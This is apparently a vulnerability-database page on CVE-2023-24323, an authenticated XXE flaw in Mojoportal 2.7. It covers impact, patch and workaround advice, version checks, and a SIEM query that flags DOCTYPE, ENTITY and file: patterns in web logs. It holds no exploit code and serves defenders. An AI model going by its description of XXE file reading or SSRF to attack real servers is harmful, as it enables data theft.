Login Sign Up

CVE-2023-24323

8.8 HIGH
XXE

📋 TL;DR

Mojoportal v2.7 contains an authenticated XML external entity (XXE) injection vulnerability that allows authenticated attackers to read arbitrary files from the server or potentially perform server-side request forgery. This affects all installations of Mojoportal version 2.7 that have not been patched.

💻 Affected Systems

Products:
  • Mojoportal
Versions: Version 2.7
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user access to exploit. All default installations of v2.7 are vulnerable.

📦 What is this software?

Mojoportal by Mojoportal

View all CVEs affecting Mojoportal →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server compromise through file disclosure of sensitive configuration files, credentials, or SSRF leading to internal network reconnaissance and attacks.

🟠

Likely Case

Unauthorized file reading of server files containing sensitive information like configuration files, passwords, or source code.

🟢

If Mitigated

Limited impact if proper network segmentation, file permissions, and XML parser hardening are implemented.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access but is straightforward once authentication is obtained.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version 2.7.0.1 or later

Vendor Advisory: https://www.mojoportal.com/

Restart Required: Yes

Instructions:

1. Backup your current installation. 2. Download the latest version from the official repository. 3. Replace vulnerable files with patched versions. 4. Restart the application server.

🔧 Temporary Workarounds

Disable XML external entity processing

all

Configure the XML parser to disable external entity resolution

Set XML parser properties: FEATURE_SECURE_PROCESSING = true, DISALLOW_DOCTYPE_DECL = true

Restrict authenticated user access

all

Limit user accounts to only trusted personnel and implement strong authentication controls

🧯 If You Can't Patch

  • Implement network segmentation to isolate Mojoportal from sensitive internal systems
  • Deploy a web application firewall (WAF) with XXE protection rules

🔍 How to Verify

Check if Vulnerable:

Check if running Mojoportal version 2.7.0.0 or earlier by examining version files or admin panel

Check Version:

Check /version.txt file or admin panel system info

Verify Fix Applied:

Verify installation shows version 2.7.0.1 or later in admin panel or version files

📡 Detection & Monitoring

Log Indicators:

  • Unusual XML file uploads or processing
  • Multiple file read attempts from authenticated users
  • XML parsing errors containing file paths

Network Indicators:

  • XML payloads containing external entity references in POST requests
  • Outbound connections to internal resources from web server

SIEM Query:

source="web_logs" AND (uri_path="*/xml*" OR method="POST") AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*file:*")

📊 Metadata

CVE ID: CVE-2023-24323
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-611
Published: February 9, 2023
Last Updated: March 24, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-24323, you might also want to check these:

CVE-2022-22486 10.0

This CVE describes an XML External Entity (XXE) vulnerability in IBM Tivoli Workload Scheduler that ...

Same vulnerability type (CWE-611)
CVE-2025-30220 9.9

This XXE vulnerability in GeoServer's GeoTools Schema class allows attackers to read arbitrary files...

Same vulnerability type (CWE-611)
CVE-2023-27874 9.9

IBM Aspera Faspex 4.4.2 contains an XML external entity injection (XXE) vulnerability that allows au...

Same vulnerability type (CWE-611)